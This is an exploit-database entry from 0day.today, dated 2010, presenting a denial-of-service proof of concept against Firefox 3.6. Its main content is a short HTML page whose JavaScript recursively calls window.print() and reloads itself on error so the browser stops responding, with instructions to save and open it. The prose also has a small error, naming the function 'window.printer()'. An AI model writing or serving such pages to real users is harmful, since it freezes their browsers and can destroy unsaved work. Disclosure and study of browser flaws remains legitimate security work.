Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit

2010-02-13T00:00:00
ID 1337DAY-ID-10880
Type zdt
Reporter Asheesh
Modified 2010-02-13T00:00:00

Description

Exploit for unknown platform in category dos / poc

                                        
                                            =====================================================================
Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
=====================================================================

# company       aksitservices
 
# Credit by Asheesh Anaconda
 
 
#Download www.mozilla.com/firefox
 
 
#Background
 
Mozilla Firefox is a popular internet browser. .....:)
 
#Vulnerability
This bug is a typical result of multitudinous  loop. 
The flaw exists when the attacker put window.printer() funtion
in multitudinous loop.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
 
 
#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any   might be lost.
 
 
 
#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla Firefox
 
========================================================================================================================
 
                                                           asheesh.html
========================================================================================================================
 
<html>
<title>asheesh kumar mani tripathi</title>
 
<script>
 
 
function
asheesh()
{
window.onerror=new Function("history.go(0)");
window.print();
asheesh();
 
 
}
asheesh();
</script>
 
</html>
                                                            
========================================================================================================================
 
 
#If you have any questions, comments, or concerns, feel free to contact me. 



#  0day.today [2018-01-04]  #